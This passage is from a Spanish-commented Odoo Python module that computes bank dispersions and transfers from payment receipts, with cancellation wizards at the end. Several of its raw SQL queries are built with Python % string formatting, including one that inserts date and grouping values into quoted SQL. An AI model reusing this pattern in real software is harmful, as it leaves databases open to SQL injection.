'totalcta':itematransferirreales.importe\n }\n self.env['ctadestino.transferencia'].create(cta_obj)\n #print(itematransferirreales.ctadestino_id.name)\n else:\n _logger.warning('se encontro cuenta')\n total=cuenta_obj.totalcta+itematransferirreales.importe\n cuenta_obj.write({'totalcta': total})\n\n @api.multi\n def detalles_atransferirconceptoctadestino(self,cobro,dispersion,recepcion):\n _logger.warning('Requiere transferencia')\n conceptosctadestino=[]\n self.env.cr.execute('''\n select cobro.id idcobro,sum(item.price_unit-valdescto)importe,conceptocobro.ctadestino_id,conceptocobro.name,item.id,conceptocobro.id\n from cb_order cobro\n join cb_order_line item on cobro.id=item.order_id\n join product_template conceptocobro on item.product_id=conceptocobro.id\n join account_bank_statement_line st_line on cobro.id = st_line.cb_statement_id\n join account_journal diario on diario.id = st_line.journal_id\n where cobro.id=%s and item.price_unit>0 and coalesce(conceptocobro.check_ctadestino,'f')='t'\n and diario.type != 'cash' and cobro.state in ('paid','invoiced')\n group by cobro.id,conceptocobro.ctadestino_id,conceptocobro.name,item.id,conceptocobro.id\n '''%(cobro.id))\n cctadestino=self.env.cr.fetchall()\n for concepto in cctadestino:\n detallesconcepto={}\n detallesconcepto={\n 'importe':concepto[1],\n 'cuentadestino_id':concepto[2],\n 'concepto':'Cta. Destino Concepto de cobro: '+concepto[3],\n 'importecubierto':0,\n 'tipovalor_id':0,\n 'termino':False,\n 'idvalores':0,\n 'iditem':concepto[4],\n 'idcborder':concepto[0],\n 'conceptocobro_id':concepto[5],\n\n }\n conceptosctadestino.append(detallesconcepto)\n\n metodospagoctadestino=[]\n self.env.cr.execute('''\n select valores.id idvalores,valores.journal_id,sum(valores.amount)importe,coalesce(metodo.transfer_required,'f')\n from cb_order cobro\n join account_bank_statement_line valores on cobro.id=valores.cb_statement_id\n join account_journal metodo on valores.journal_id=metodo.id\n where cobro.id=%s and metodo.type != 'cash' and cobro.state in ('paid','invoiced')\n group by valores.id,valores.journal_id,coalesce(metodo.transfer_required,'f')\n order by coalesce(metodo.transfer_required,'f') desc\n '''%(cobro.id))\n metodospago=self.env.cr.fetchall()\n for tipovalor in metodospago:\n detallesmetodopago={}\n detallesmetodopago={\n 'idvalores':tipovalor[0],\n 'tipopago_id':tipovalor[1],\n 'importe':tipovalor[2],\n 'importetransferido':0,\n 'termino':False,\n 'transfiere':False,\n \n }\n metodospagoctadestino.append(detallesmetodopago)\n\n\n for metodopago in metodospagoctadestino:\n #print('aqui',metodopago['importe']-metodopago['importetransferido'])\n termino=False\n while (termino!=True):\n for ctadestino in conceptosctadestino:\n if not ctadestino['termino']:\n if metodopago['importetransferido']!=metodopago['importe']:\n importemetodo=metodopago['importe']-metodopago['importetransferido']\n importeconcepto=ctadestino['importe']-ctadestino['importecubierto']\n #print(importemetodo >= importeconcepto)\n #print(metodopago['importe'],metodopago['importetransferido'])\n #print(ctadestino['importe'],ctadestino['importecubierto'])\n if round(importemetodo, 2)>=round(importeconcepto, 2): \n _logger.warning('ajusto')\n ctadestino['tipovalor_id']=metodopago['tipopago_id']\n ctadestino['importecubierto']=importeconcepto\n ctadestino['idvalores']=metodopago['idvalores']\n ctadestino['termino']=True\n metodopago['importetransferido']=metodopago['importetransferido']+importeconcepto\n metodopago['transfiere']=True\n termino=True\n else:\n 
_logger.warning('no ajusto')\n\n ctadestino['tipovalor_id']=metodopago['tipopago_id']\n ctadestino['importe']=importemetodo\n ctadestino['importecubierto']=importemetodo\n ctadestino['termino']=True\n ctadestino['idvalores']=metodopago['idvalores']\n \n metodopago['importetransferido']=metodopago['importetransferido']+importemetodo\n metodopago['transfiere']=True\n\n importenuevoregistro=importeconcepto-importemetodo\n #raise ValidationError(importenuevoregistro)\n detallesconcepto={}\n detallesconcepto={\n 'importe':importenuevoregistro,\n 'cuentadestino_id':ctadestino['cuentadestino_id'],\n 'concepto':'Cta. Destino Concepto de cobro: '+ctadestino['concepto'],\n 'importecubierto':0,\n 'tipovalor_id':0,\n 'termino':False,\n 'idvalores':0,\n 'iditem':ctadestino['iditem'],\n 'idcborder':ctadestino['idcborder'],\n 'conceptocobro_id':ctadestino['conceptocobro_id'],\n\n }\n conceptosctadestino.append(detallesconcepto)\n termino=True\n else:\n termino=True\n\n for ctadestino in conceptosctadestino:\n ctadestino_obj=self.env['res.partner.bank'].search([('id','=',ctadestino['cuentadestino_id'])])\n metodospago=self.env['account.bank.statement.line'].search([('id','=',ctadestino['idvalores'])])\n \n if metodospago.journal_id.group_by_type:\n formapagodatoscomplementarios=''\n else:\n formapagodatoscomplementarios=metodospago.concat\n\n cuentaorigen=self.busca_ctadestino(metodospago,True)\n conceptocobro_obj=self.env['product.template'].search([('id','=',ctadestino['conceptocobro_id'])])\n conceptocobro='Cta. Destino Concepto de cobro: '+conceptocobro_obj.name\n\n if not ctadestino_obj:\n raise ValidationError ('''\n El Concepto de Cobro %s,\n No tiene configurada su cuenta destino.\n '''%(str(conceptocobro_obj.default_code)+' - '+str(conceptocobro_obj.name)))\n\n #REGISTRO DE PARA NOTA DE CREDITO EN CASO DE CACELAR RECIBO DARLE LA REVERSA A LO QUE SE TRANSFIRIO\n #reg_transfereciacobro={}\n #reg_transfereciacobro={\n # 'cborderline_id':ctadestino['iditem'],\n # 'dispersion_id':dispersion.id,\n # 'cborder_id':ctadestino['idcborder'],\n # 'tipovalor_id':ctadestino['tipovalor_id'],\n # 'ctaorigen_id':cuentaorigen.id,\n # 'ctadestino_id':ctadestino_obj.id,\n # 'importe':ctadestino['importe'],\n # 'concat':metodospago.concat,\n # 'active':True,\n # 'conceptocobro_id':conceptocobro_obj.id,\n #}\n #CAMBIO\n #self.env['cb.order.line.transferencia'].create(reg_transfereciacobro)\n #REGISTRO DE PARA NOTA DE CREDITO EN CASO DE CACELAR RECIBO DARLE LA REVERSA A LO QUE SE TRANSFIRIO\n\n if cuentaorigen:\n itematransferir=self.env['dispersionbancaria.transferir'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',metodospago.journal_id.id),('ctaorigen_id','=',cuentaorigen.id),('ctadestino_id','=',ctadestino_obj.id),('conceptocobro_id','=',conceptocobro_obj.id),('concat','=',formapagodatoscomplementarios),('conceptocobro','=',conceptocobro)])\n if cuentaorigen.id != ctadestino_obj.id:\n if not itematransferir:\n self.crea_atransferir(metodospago.journal_id,ctadestino['importe'],cuentaorigen,ctadestino_obj,dispersion.id,conceptocobro_obj.id,formapagodatoscomplementarios,conceptocobro)\n else:\n self.actualiza_atransferir(itematransferir,ctadestino['importe'])\n\n #cuenta_obj=self.env['ctadestino.transferencia'].search([('dispersion_id','=',dispersion.id),('ctadestino_id','=',ctadestino_obj.id)])\n #if not cuenta_obj:\n # cta_obj={}\n # cta_obj={\n # 'dispersion_id':dispersion.id,\n # 'ctadestino_id':ctadestino_obj.id,\n # 'totalcta':ctadestino['importe']\n # }\n # 
self.env['ctadestino.transferencia'].create(cta_obj)\n # print(ctadestino_obj.name)\n #else:\n # print('se encontro cuenta')\n # total=cuenta_obj.totalcta+ctadestino['importe']\n # cuenta_obj.write({'totalcta': total})\n\n for metodopago in metodospagoctadestino:\n metodospago=self.env['account.bank.statement.line'].search([('id','=',metodopago['idvalores'])])\n #Se valida que el metodo de pago no requiere transferencia ya que ese regisrto se tiene contemplado al final de los recorridos de lo contrario duplicaria informacion\n if metodospago.journal_id.transfer_required:\n cuentadestino=self.busca_ctadestino(metodospago,False)\n\n #CAMBIO\n #reqtransferencia=metodopago['transfiere']\n reqtransferencia=False\n\n if metodospago.journal_id.group_by_type:\n _logger.warning('agrupa')\n datoscomple=''\n else:\n _logger.warning('no agrupa')\n datoscomple=metodospago.concat\n\n itemajuste=self.env['cb.session.ajustes'].search([('session_id','=',recepcion.id),('metodo','=',metodospago.journal_id.id),('concat','=',metodospago.concat),('incluidodispersion','=',False)])\n \n importeori=metodopago['importe']\n importe=metodopago['importe']\n importeajustepositivo=0\n importeajustenegativo=0\n if itemajuste:\n if itemajuste.tipo_ajuste=='positivo':\n _logger.warning('Ajuste Positivo')\n importe=metodopago['importe']+itemajuste.importe\n importeajustepositivo=itemajuste.importe\n else:\n _logger.warning('Ajuste Negativo')\n importe=metodopago['importe']-itemajuste.importe\n importeajustenegativo=itemajuste.importe*-1\n self.crea_ajustes(itemajuste,dispersion.id)\n itemajuste.write({'incluidodispersion':True})\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',metodospago.journal_id.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n\n if not itemdispersion:\n self.crea_itemsdispersion(importe,metodospago.journal_id.id,metodospago.journal_id.id,importeori,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,importeajustepositivo,importeajustenegativo,False,False)\n\n else:\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,importeajustepositivo,importeajustenegativo)\n\n @api.multi\n def detalles_dispersionconceptoctadestino(self,cobro,dispersion,recepcion,efectivo_obj):\n _logger.warning('No requiere transferencia')\n reqtransferencia=False\n conceptosctadestino=[]\n self.env.cr.execute('''\n select cobro.id idcobro,sum(item.price_unit-valdescto)importe,conceptocobro.ctadestino_id,conceptocobro.name,item.id\n from cb_order cobro\n join cb_order_line item on cobro.id=item.order_id\n join product_template conceptocobro on item.product_id=conceptocobro.id\n join account_bank_statement_line st_line on cobro.id = st_line.cb_statement_id\n join account_journal diario on diario.id = st_line.journal_id\n where cobro.id=%s and item.price_unit>0 and coalesce(conceptocobro.check_ctadestino,'f')='t'\n and diario.type != 'cash' and cobro.state in ('paid','invoiced')\n group by cobro.id,conceptocobro.ctadestino_id,conceptocobro.name,item.id\n '''%(cobro.id))\n cctadestino=self.env.cr.fetchall()\n for concepto in cctadestino:\n detallesconcepto={}\n detallesconcepto={\n 'importe':concepto[1],\n 'cuentadestino_id':concepto[2],\n 'concepto':'Cta. 
Destino Concepto de cobro: '+concepto[3],\n 'importecubierto':0,\n 'tipovalor_id':efectivo_obj.id,\n 'termino':False,\n 'iditem':concepto[4],\n 'idcborder':concepto[0],\n 'idvalores':0,\n 'concat':'',\n\n }\n conceptosctadestino.append(detallesconcepto)\n\n\n for ctadestino in conceptosctadestino:\n _logger.warning('cuenta destino concepto')\n #print (ctadestino['termino'])\n #print(ctadestino['importe'])\n #ctadestino['importe']=ctadestino['importe']*10\n #print(ctadestino['concepto'])\n\n ctadestino_obj=self.env['res.partner.bank'].search([('id','=',ctadestino['cuentadestino_id'])])\n tipovalor_obj=self.env['account.journal'].search([('id','=',ctadestino['tipovalor_id'])])\n metodospago=self.env['account.bank.statement.line'].search([('id','=',ctadestino['idvalores'])])\n cuentaorigen=efectivo_obj.destination_account_id\n #if not cuentaorigen:\n # raise ValidationError('No se encontro la cuenta origen del metodo de pago '+str(cuentaorigen.name))\n importeori=ctadestino['importe']\n importe=ctadestino['importe']\n\n\n #REGISTRO DE PARA NOTA DE CREDITO EN CASO DE CACELAR RECIBO DARLE LA REVERSA A LO QUE SE TRANSFIRIO\n #reg_transfereciacobro={}\n #reg_transfereciacobro={\n # 'cborderline_id':ctadestino['iditem'],\n # 'dispersion_id':dispersion.id,\n # 'cborder_id':ctadestino['idcborder'],\n # 'tipovalor_id':ctadestino['tipovalor_id'],\n # 'ctaorigen_id':cuentaorigen.id,\n # 'ctadestino_id':ctadestino_obj.id,\n # 'importe':ctadestino['importe'],\n # 'concat':'S/D',\n # 'active':True,\n #}\n #CAMBIO\n #self.env['cb.order.line.transferencia'].create(reg_transfereciacobro)\n #REGISTRO DE PARA NOTA DE CREDITO EN CASO DE CACELAR RECIBO DARLE LA REVERSA A LO QUE SE TRANSFIRIO\n\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',tipovalor_obj.id),('destino_id','=',ctadestino_obj.id),('datoscomplementarios','=',ctadestino['concepto'])])\n\n if not itemdispersion:\n self.crea_itemsdispersion(importe,tipovalor_obj.id,tipovalor_obj.id,importeori,importe,ctadestino_obj.id,ctadestino_obj.bank_id.id,reqtransferencia,dispersion.id,ctadestino['concepto'],0,0,True,False)\n else:\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,0,0)\n\n if ctadestino['concat']=='S/D': \n datoscomple=False \n else: \n datoscomple=True \n \n importeutilizado=0 \n itemresumenpago=self.env['account.bank.statement'].search([('cb_session_id','=',recepcion.id),('journal_id','=',tipovalor_obj.id)]) \n if datoscomple: \n metodo=itemresumenpago.env['account.statement.group.line'].search([('concat','=',ctadestino['concat']),('statement_id','=',itemresumenpago.id)]) \n else: \n metodo=itemresumenpago.env['account.statement.group.line'].search([('statement_id','=',itemresumenpago.id)]) \n #raise ValidationError(metodo) \n importeutilizado=importe+metodo.utilizado \n metodo.write({'utilizado':importeutilizado})\n\n\n metodospagoctadestino=[]\n self.env.cr.execute('''\n select valores.id idvalores,valores.journal_id,sum(valores.amount)importe,coalesce(metodo.transfer_required,'f')transferencia,coalesce(valores.concat,'S/D')\n from cb_order cobro\n join account_bank_statement_line valores on cobro.id=valores.cb_statement_id\n join account_journal metodo on valores.journal_id=metodo.id\n where cobro.id=%s and coalesce(metodo.transfer_required,'f')='t'\n and metodo.type != 'cash' and cobro.state in ('paid', 'invoiced')\n group by 
valores.id,valores.journal_id,coalesce(metodo.transfer_required,'f'),coalesce(valores.concat,'S/D')\n '''%(cobro.id))\n metodospago=self.env.cr.fetchall()\n for tipovalor in metodospago:\n detallesmetodopago={}\n detallesmetodopago={\n 'idvalores':tipovalor[0],\n 'tipopago_id':tipovalor[1],\n 'importe':tipovalor[2],\n 'importetransferido':0,\n 'termino':False,\n 'reqtransferencia':tipovalor[3],\n 'concat':tipovalor[4],\n \n }\n metodospagoctadestino.append(detallesmetodopago)\n\n for metodopago in metodospagoctadestino:\n metodospago=self.env['account.bank.statement.line'].search([('id','=',metodopago['idvalores'])])\n cuentadestino=self.busca_ctadestino(metodospago,False)\n\n if metodospago.journal_id.group_by_type:\n _logger.warning('agrupa')\n datoscomple=''\n else:\n _logger.warning('no agrupa')\n datoscomple=metodospago.concat\n\n itemajuste=self.env['cb.session.ajustes'].search([('session_id','=',recepcion.id),('metodo','=',metodospago.journal_id.id),('concat','=',metodospago.concat),('incluidodispersion','=',False)]) \n \n importeori=metodopago['importe'] \n importe=metodopago['importe'] \n importeajustepositivo=0\n importeajustenegativo=0\n\n if itemajuste: \n if itemajuste.tipo_ajuste=='positivo': \n _logger.warning('Ajuste Positivo') \n importe=metodopago['importe']+itemajuste.importe\n importeajustepositivo=itemajuste.importe \n else: \n _logger.warning('Ajuste Negativo') \n importe=metodopago['importe']-itemajuste.importe\n importeajustenegativo=itemajuste.importe*-1 \n self.crea_ajustes(itemajuste,dispersion.id) \n itemajuste.write({'incluidodispersion':True})\n\n #se busca en los detalles de la dispersion para agrupar por dato complementario\n itemdispersion=self.env['dispersionbancaria.line'].search([('dispersion_id','=',dispersion.id),('tipovalor_id','=',metodospago.journal_id.id),('destino_id','=',cuentadestino.id),('datoscomplementarios','=',datoscomple)])\n\n if not itemdispersion:\n self.crea_itemsdispersion(importe,metodospago.journal_id.id,metodospago.journal_id.id,importeori,importe,cuentadestino.id,cuentadestino.bank_id.id,reqtransferencia,dispersion.id,datoscomple,importeajustepositivo,importeajustenegativo,False,False)\n\n else:\n self.actualiza_itemsdispersion(itemdispersion,importeori,importe,reqtransferencia,importeajustepositivo,importeajustenegativo)\n\n @api.multi\n def valida_cobroctadestino(self,cobro):\n _logger.warning('Inicio valida cobro cta destino')\n _logger.warning(cobro.pos_reference)\n #Se hace una consulta buscando conceptos de cta destino \n self.env.cr.execute('''\n select count(cobro.id)\n from cb_order cobro\n join cb_order_line item on cobro.id=item.order_id\n join product_template conceptocobro on item.product_id=conceptocobro.id\n join account_bank_statement_line st_line on cobro.id = st_line.cb_statement_id\n join account_journal diario on diario.id = st_line.journal_id\n where cobro.id=%s and item.price_unit>0 and coalesce(conceptocobro.check_ctadestino,'f')='t' and (cobro.state='paid' or cobro.state='invoiced')\n and diario.type != 'cash'\n '''%(cobro.id))\n cobroctadestino=self.env.cr.fetchall()[0][0]\n\n if cobroctadestino!=0:\n return True\n else:\n return False\n _logger.warning('Fin valida cobro cta destino')\n\n @api.multi\n def importe_cobroctadestino(self,cobro):\n _logger.warning('Inicio busqueda importe cta destino')\n _logger.warning(cobro.pos_reference)\n #Se hace una consulta buscando el importe de conceptos de cta destino \n self.env.cr.execute('''\n select cobro.id 
idcobro,sum(item.price_unit-coalesce(item.valdescto,0))importe\n from cb_order cobro\n join cb_order_line item on cobro.id=item.order_id\n join product_template conceptocobro on item.product_id=conceptocobro.id\n join account_bank_statement_line st_line on cobro.id = st_line.cb_statement_id\n join account_journal diario on diario.id = st_line.journal_id\n where cobro.id=%s and item.price_unit>0 and coalesce(conceptocobro.check_ctadestino,'f')='t'\n and (cobro.state='paid' or cobro.state='invoiced') and diario.type != 'cash'\n group by cobro.id\n '''%(cobro.id))\n importectadestino=self.env.cr.fetchall()\n impctadestino=0\n for i in importectadestino:\n impctadestino=i[1]\n return impctadestino \n _logger.warning('Fin busqueda importe cta destino')\n\n @api.multi\n def importe_noreqtransferencia(self,cobro,recepcion,importectadestino,importereal):\n _logger.warning('Inicio Busca metodo pago que no requiera transferencia')\n _logger.warning(cobro.pos_reference)\n #Se hace una consulta buscando conceptos de cta destino \n #self.env.cr.execute('''\n # select cobro.id idcobro,sum(valores.amount)importe\n # from cb_order cobro\n # join account_bank_statement_line valores on cobro.id=valores.cb_statement_id\n # join account_journal metodo on valores.journal_id=metodo.id\n # where cobro.id=%s and coalesce(metodo.transfer_required,'f')='f' and (coalesce(metodo.virtual,'f')='f' and coalesce(metodo.select_account,'f')='f')\n # group by cobro.id\n # '''%(cobro.id))\n \n\n self.env.cr.execute('''\n select cobro.id idcobro,valores.id,valores.journal_id,coalesce(valores.concat,'S/D'),sum(valores.amount)importe\n from cb_order cobro\n join account_bank_statement_line valores on cobro.id=valores.cb_statement_id\n join account_journal metodo on valores.journal_id=metodo.id\n where cobro.id=%s and coalesce(metodo.transfer_required,'f')='f'\n and (coalesce(metodo.virtual,'f')='f' and coalesce(metodo.select_account,'f')='f')\n group by cobro.id,valores.id,valores.journal_id,coalesce(valores.concat,'S/D')\n '''%(cobro.id))\n importemetodo=self.env.cr.fetchall()\n impmetodopago=0\n importe=0\n aplica=False\n for imp in importemetodo:\n importe=importe+imp[4]\n\n #Valido que el cobro tenga importe de un metodo de pago que no requiera trnaferencia\n if importe==0:\n aplica=False\n #Valido que el importe de que no requiere transferencia alcance para el monto de los conceptos de cuenta de destino\n elif importe>=importectadestino:\n #Valido que el importe del efectivo global alcance para cubir el monto de los conceptos de cuenta de destino\n if importereal>=importectadestino:\n aplica=True\n else:\n aplica=False\n else:\n aplica=False\n\n return aplica\n\n #raise ValidationError(importereal)\n\n # if imp[3]=='S/D':\n # datoscomple=False \n # else: \n # datoscomple=True\n # itemresumenpago=self.env['account.bank.statement'].search([('cb_session_id','=',recepcion.id),('journal_id','=',imp[2])])\n # if datoscomple:\n # metodo=itemresumenpago.env['account.statement.group.line'].search([('concat','=',imp[3]),('statement_id','=',itemresumenpago.id)])\n # else:\n # metodo=itemresumenpago.env['account.statement.group.line'].search([('statement_id','=',itemresumenpago.id)])\n # #raise ValidationError(metodo)\n # impmetodopago=impmetodopago+(metodo.amount_real-metodo.utilizado)\n #if importe >= importectadestino:\n #if impmetodopago >= importectadestino:\n # return True\n #else:\n # return False\n #else:\n #return False\n _logger.warning('Fin Busca metodo pago que no requiera transferencia')\n\n @api.multi\n def 
crea_atransferir(self,tipovalor_obj,importe,ctaorigen,ctadestino,dispersion_id,conceptocobro_id,concat,conceptocobro):\n detallesatransferir={}\n detallesatransferir={\n 'tipovalor_id':tipovalor_obj.id,\n 'importe':importe,\n 'ctaorigen_id':ctaorigen.id,\n 'ctadestino_id':ctadestino.id,\n 'dispersion_id':dispersion_id,\n 'conceptocobro_id':conceptocobro_id,\n 'concat':concat,\n 'conceptocobro':conceptocobro,\n\n }\n _logger.warning(':::::::::::::::::::::::::'+str(importe))\n itematransferir = self.env['dispersionbancaria.transferir'].with_context(check_move_validity=False).create(detallesatransferir)\n _logger.warning(':::::::::::::'+str(itematransferir.id))\n _logger.warning(':::::::::::::::::::::::::'+str(itematransferir.importe))\n\n @api.multi\n def actualiza_atransferir(self,itematransferir,importe):\n imp=itematransferir.importe+importe\n _logger.warning(':::::::::::::::::::::::::'+str(importe))\n _logger.warning(':::::::::::::::::::::::::'+str(itematransferir.importe))\n itematransferir.write({'importe':imp})\n _logger.warning(':::::::::::::::::::::::::'+str(itematransferir.importe))\n\n\n @api.multi\n def busca_ctadestino(self,metodospago,doble):\n _logger.warning('||||||||||||||||||||||||||||||')\n _logger.warning('Inicio Busca cta bancaria')\n #raise ValidationError(metodospago.journal_id.search_by_bank and (not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account and not metodospago.journal_id.select_account))\n #and (not metodospago.journal_id.search_by_bank and not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual)\n #Cheque\n #cuentadestino=''\n if metodospago.journal_id.search_by_bank and (not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual):\n _logger.warning('requiere banco')\n cuentadestino=self.env['res.partner.bank'].search([('bank_id','=',metodospago.bank.id),('dispersion_check','=',True)],limit=1)\n if not cuentadestino:\n _logger.warning('No acepta cheque')\n cuentadestino=metodospago.journal_id.destination_account_id\n else:\n _logger.warning('Acepta cheque')\n \n #Tarjeta\n elif metodospago.journal_id.terminal_use and metodospago.journal_id.select_bank_account and (not metodospago.journal_id.search_by_bank and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual):\n _logger.warning('Cta.Bancaria Y Terminal')\n cuentadestino=metodospago.account_bank\n if not cuentadestino:\n _logger.warning('Terminal')\n cuentadestino=metodospago.terminal.destination_account\n else:\n _logger.warning('Cta Bancaria')\n\n #Transferencia,Fichas de Depositos,Otros\n elif metodospago.journal_id.select_bank_account and (not metodospago.journal_id.search_by_bank and not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual):\n _logger.warning('Cta Bancaria')\n cuentadestino=metodospago.account_bank\n\n #Reconocimiento de derechos\n elif metodospago.journal_id.select_account and metodospago.journal_id.virtual and (not metodospago.journal_id.search_by_bank and not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account):\n _logger.warning('Virtual')\n if metodospago.journal_id.destination_account_id.virtual_account:\n _logger.warning('Cuenta virtual')\n if doble:\n if 
metodospago.journal_id.destination_account_id.double_transfer:\n cuentadestino=metodospago.journal_id.destination_account_id.double_transfer_account_id\n else:\n raise ValidationError('No se encontro habilitada la opción de transferencia doble dentro de la configuración de la cuenta virtual ')\n else:\n cuentadestino=metodospago.journal_id.destination_account_id\n else:\n raise ValidationError('No se encontro la cuenta virtual,Revisar configuración de cuentas bancarias')\n cuentadestino=self.env['res.partner.bank'].search([('id','=',0)],limit=1)\n _logger.warning('Sin cuenta virtual')\n\n #Efectivo y Terceros\n elif not metodospago.journal_id.search_by_bank and not metodospago.journal_id.terminal_use and not metodospago.journal_id.select_bank_account and not metodospago.journal_id.select_account and not metodospago.journal_id.virtual:\n _logger.warning('Cta destino efectivo')\n cuentadestino=metodospago.journal_id.destination_account_id\n\n else:\n raise ValidationError(_('No esta configurado correctamente el metodo de pago %s') % metodospago.journal_id.name)\n _logger.warning('||||||||||||||||||||||||||||||')\n\n if cuentadestino.id:\n return cuentadestino\n #else:\n # \n # raise ValidationError(_('No se encontro la cuenta destino de %s, favor de revisar la configuración del metodo de pago') % metodospago.journal_id.name)\n _logger.warning('Fin Busca cta bancaria')\n\n @api.multi\n def crea_ajustes(self,ajuste,dispersion_id):\n detallesajuste={}\n importe=0\n if ajuste.tipo_ajuste=='positivo':\n importe=ajuste.importe\n else:\n importe=ajuste.importe*-1\n #if metodospago_amount > 0:\n detallesajuste={\n 'tipo_ajuste':ajuste.tipo_ajuste,\n 'tipovalor_id':ajuste.metodo.id,\n 'importe':importe,\n 'concat':ajuste.concat,\n 'dispersion_id':dispersion_id,\n\n }\n #diccionario.append(detallesdispersion)\n self.env['dispersionbancaria.ajustes'].with_context(check_move_validity=False).create(detallesajuste)\n _logger.warning('se creo detalle de ajustes')\n #else:\n # print('no se creo detalle de dispersion')\n\n #for p in diccionario:\n # print(p)\n # print(p.get('tipovalor_id'))\n #raise ValidationError(diccionario)\n\n @api.multi\n def crea_itemsdispersion(self,metodospago_amount,valor_id,tipovalor_id,importeoriginal,importe,destino_id,banco_id,reqtransferencia,dispersion_id,datoscomplementarios,importeajustepositivo,importeajustenegativo,transferido,efectivoglobal):\n detallesdispersion={}\n #if metodospago_amount > 0:\n detallesdispersion={\n 'valor_id':valor_id,\n 'tipovalor_id':tipovalor_id,\n 'importeoriginal':importeoriginal,\n 'importe':importe,\n 'destino_id':destino_id,\n 'banco_id':banco_id,\n 'reqtransferencia':reqtransferencia,\n 'dispersion_id':dispersion_id,\n 'datoscomplementarios':datoscomplementarios,\n 'importeajustepositivo':importeajustepositivo,\n 'importeajustenegativo':importeajustenegativo,\n 'transferido':transferido,\n 'efectivoglobal':efectivoglobal,\n\n }\n #diccionario.append(detallesdispersion)\n self.env['dispersionbancaria.line'].with_context(check_move_validity=False).create(detallesdispersion)\n _logger.warning('se creo detalle de dispersion')\n #else:\n # print('no se creo detalle de dispersion')\n\n #for p in diccionario:\n # print(p)\n # print(p.get('tipovalor_id'))\n #raise ValidationError(diccionario)\n\n @api.multi\n def actualiza_itemsdispersion(self,itemdispersion,importeori,importe,reqtransferencia,importeajustepositivo,importeajustenegativo):\n impo=itemdispersion.importeoriginal+importeori\n imp=itemdispersion.importe+importe\n 
imppositivo=itemdispersion.importeajustepositivo+importeajustepositivo\n impnegativo=itemdispersion.importeajustenegativo+importeajustenegativo\n\n if itemdispersion.reqtransferencia:\n reqtransferencia=True\n\n itemdispersion.write({'importeoriginal': impo,'importe':imp,'reqtransferencia':reqtransferencia,'importeajustepositivo':imppositivo,'importeajustenegativo':impnegativo})\n\n\n @api.multi\n def importe_general_efectivo(self,fecha,agrupacioncaja):\n self.env.cr.execute('''\n select cast(recepcion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),recepcion.boxtype_id,\n sum(coalesce(detalle.total_entry_encoding,0))importetransacciones,\n sum(coalesce(detalle.balance_end_real,0)-coalesce(detalle.balance_start,0))importereal\n ,metodo.id\n from cb_session recepcion\n join account_bank_statement detalle on recepcion.id=detalle.cb_session_id\n join account_journal metodo on detalle.journal_id=metodo.id\n where cast(start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE)='%s' \n and recepcion.boxtype_id='%s' \n and coalesce(recepcion.incluidodispersion,'f') <> 't' \n and recepcion.state='closed' \n and recepcion.start_at is not null\n and coalesce(metodo.transfer_required,'f')='f'\n group by cast(recepcion.start_at AT TIME ZONE 'UTC' AT TIME ZONE 'America/Mexico_City' AS DATE),recepcion.boxtype_id,metodo.id\n '''%(fecha,agrupacioncaja))\n record=self.env.cr.fetchall()\n importetransacciones=0\n importereal=0\n metodo=False\n count=0\n for i in record:\n importetransacciones=i[2]\n importereal=i[3]\n metodo=i[4]\n count=count+1\n\n if count >1:\n raise ValidationError ('''\n Existe mas de un metodo de pago configurado como no requiere transferencia.\n\n -Solo el Efectivo debe estar configurado como no requiere transferencia.\n -Revisar Configuración de metodos de pago.\n '''%())\n\n return {\n 'importetransacciones': importetransacciones,\n 'importereal':importereal,\n 'metodopago': metodo,\n }\n\n\n\nclass cls_wizardmotivocancelaciondispersion(models.TransientModel):\n \"\"\"\n Account move reversal wizard, it cancel an account move by reversing it.\n \"\"\"\n _name = 'motivo.cancelacion'\n\n motivo = fields.Char(string='Motivo de cancelacion', required=True)\n\n @api.multi\n def registra_motivocancelacion(self):\n dispersion_id = self._context.get('active_ids', False)\n for dis in dispersion_id:\n dispersion=self.env['dispersionbancaria'].search([('id','=',dis)])\n\n if dispersion.incluidotransferencia:\n raise ValidationError('Esta dispersión,ya esta incluida en una transferencia bancaria. 
Para cancelar la dispersión, cancelar primero la Transferencia')\n\n if dispersion.state=='cancel':\n raise ValidationError('Alguna Dispersión ya esta cancelada')\n dispersion.write({'state': 'pcancel','estatusanterior':dispersion.state})\n\n motivocancelacion={}\n motivocancelacion={\n 'dispersion_id':dispersion.id,\n 'motivo':'Cancelacion: '+str(self.motivo)\n }\n self.env['motivo.cancelaciondispersion'].create(motivocancelacion)\n\n @api.multi\n def registra_rechazomotivocancelacion(self):\n dispersion_id = self._context.get('active_ids', False)\n for dis in dispersion_id:\n dispersion=self.env['dispersionbancaria'].search([('id','=',dis)])\n if dispersion.state!='pcancel':\n raise ValidationError('Algunas Dispersiones no se puede rechazar debido a que no estan en pendiente de cancelación')\n\n #count=self.env['account.move'].search_count([('dispersion_id', '=', dispersion.id)])\n #if count==0:\n # dispersion.write({'state': 'draft'})\n #else:\n # dispersion.write({'state': 'done'})\n dispersion.write({'state': dispersion.estatusanterior})\n motivocancelacion={}\n motivocancelacion={\n 'dispersion_id':dispersion.id,\n 'motivo':'Rechazo: '+str(self.motivo)\n }\n 